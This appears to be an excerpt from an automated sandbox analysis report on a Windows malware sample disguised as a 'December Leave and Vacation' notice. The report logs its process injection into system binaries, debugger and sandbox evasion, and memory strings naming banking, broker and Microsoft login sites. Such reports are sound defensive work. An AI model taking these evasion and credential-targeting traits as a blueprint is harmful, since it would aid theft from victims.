                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic file information: File size 1207808 > 1048576
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: Utilman.pdb source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eAdBvdCMNQkVZK.exe, 00000004.00000000.2397251111.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4579697275.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Utilman.pdbGCTL source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9E01E LoadLibraryA,GetProcAddress,0_2_00F9E01E
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA6B05 push ecx; ret 0_2_00FA6B18
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_01A4DBF4 push ecx; iretd 0_2_01A4DC52
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004050D7 push cs; iretd 2_2_004050D8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160FE push esp; iretd 2_2_0041611F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403160 push eax; ret 2_2_00403162
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004141D4 pushad ; iretd 2_2_0041429E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414257 pushad ; iretd 2_2_0041429E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412318 push ebx; iretd 2_2_00412321
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041845E push es; retf 2_2_0041845F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413E23 push edi; iretd 2_2_00413E2D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E2 push ds; retf 2_2_0040180A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A7F3 push eax; ret 2_2_0040A80E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413F90 push ss; retf 2_2_00413F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeFile created: \mandatory notice for all december leave and vacation application.exe
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeFile created: \mandatory notice for all december leave and vacation application.exeJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FE8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00FE8111
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F9EB42
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FA123A
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeAPI/Special instruction interceptor: Address: 1A4D014
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\Utilman.exeWindow / User API: threadDelayed 2236Jump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeWindow / User API: threadDelayed 7737Jump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeEvaded block: after key decisiongraph_0-95115
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95653
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748Thread sleep count: 2236 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748Thread sleep time: -4472000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748Thread sleep count: 7737 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exe TID: 3748Thread sleep time: -15474000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe TID: 5244Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\Utilman.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FC6CA9
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00FC60DD
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00FC63F9
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FCEB60
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FCF5FA
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCF56F FindFirstFileW,FindClose,0_2_00FCF56F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FD1B2F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FD1C8A
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FD1F94
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F9DDC0
                Source: 40473HJ96.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 40473HJ96.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 40473HJ96.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 40473HJ96.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4580229610.000000000132F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: 40473HJ96.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 40473HJ96.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 40473HJ96.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 40473HJ96.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2810654551.00000193F1E2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40473HJ96.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 40473HJ96.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 40473HJ96.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007D5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,11696428655f
                Source: 40473HJ96.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 40473HJ96.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 40473HJ96.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 40473HJ96.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 40473HJ96.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 40473HJ96.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 40473HJ96.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 40473HJ96.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeAPI call chain: ExitProcess graph end nodegraph_0-94507
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeAPI call chain: ExitProcess graph end nodegraph_0-95405
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177C3 LdrLoadDll,2_2_004177C3
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD6AAF BlockInput,0_2_00FD6AAF
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F83D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83D19
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00FB3920
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9E01E LoadLibraryA,GetProcAddress,0_2_00F9E01E
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_01A4D280 mov eax, dword ptr fs:[00000030h]0_2_01A4D280
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_01A4D2E0 mov eax, dword ptr fs:[00000030h]0_2_01A4D2E0
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_01A4BC50 mov eax, dword ptr fs:[00000030h]0_2_01A4BC50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
